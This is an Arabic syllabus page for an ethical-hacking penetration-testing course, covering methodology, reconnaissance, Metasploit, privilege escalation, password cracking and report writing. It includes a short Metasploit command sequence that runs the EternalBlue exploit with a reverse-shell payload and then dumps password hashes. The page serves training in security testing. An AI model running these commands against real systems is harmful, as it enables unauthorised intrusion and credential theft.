اختبار الاختراق (Penetration Testing)

منهجية الاختراق الأخلاقي — من جمع المعلومات حتى كتابة التقرير النهائي.

المرحلة 06 6 أسابيع متقدم

درس

أدوات رئيسية

25+

مهارة مكتسبة

📖 نظرة عامة

مراحل Penetration Testing

اختبار الاختراق المنهجي يتبع 5 مراحل: Reconnaissance → Scanning → Exploitation → Post Exploitation → Reporting. ستتعلم كل مرحلة بالتفصيل العملي.

🔍

Reconnaissance

جمع المعلومات — OSINT, DNS enumeration, Google Dorking.

💥

Exploitation

استخدام Metasploit وexploits مخصصة لاختراق الأنظمة.

⬆️

Privilege Escalation

رفع الصلاحيات من مستخدم عادي إلى root/Administrator.

📝

Report Writing

كتابة تقرير احترافي يشرح الثغرات وطريقة الإصلاح.

📋 المحاور التفصيلية

#	المحور	المدة
01	منهجية PTES — معيار اختبار الاختراق	2 أيام
02	Reconnaissance — OSINT وGoogle Dorking	3 أيام
03	Enumeration — Nmap المتقدم وNikto	3 أيام
04	Metasploit Framework — الأساسيات	4 أيام
05	Exploitation — استغلال الثغرات المعروفة	4 أيام
06	Linux Privilege Escalation	3 أيام
07	Windows Privilege Escalation	3 أيام
08	Password Cracking — John, Hashcat	3 أيام
09	Post Exploitation — pivoting وlateral movement	3 أيام
10	Writing Exploits — Buffer Overflow basics	4 أيام
11	كتابة تقرير اختبار الاختراق	2 أيام
12	مشروع: اختراق آلة HackTheBox	4 أيام

💻 Metasploit

Terminal — Metasploit
# تشغيل Metasploit
msfconsole

# البحث عن exploit
search type:exploit platform:windows smb

# استخدام exploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
exploit

# بعد الاختراق
sysinfo
getuid
hashdump
shell

✅ ما يجب إتقانه

🎯 1. منهجية PTES بالكامل
2. OSINT وجمع المعلومات
3. استخدام Metasploit
4. رفع الصلاحيات على Linux وWindows
5. كسر كلمات المرور
6. كتابة تقرير احترافي

المرحلة 5 المرحلة 7: الفريق الأزرق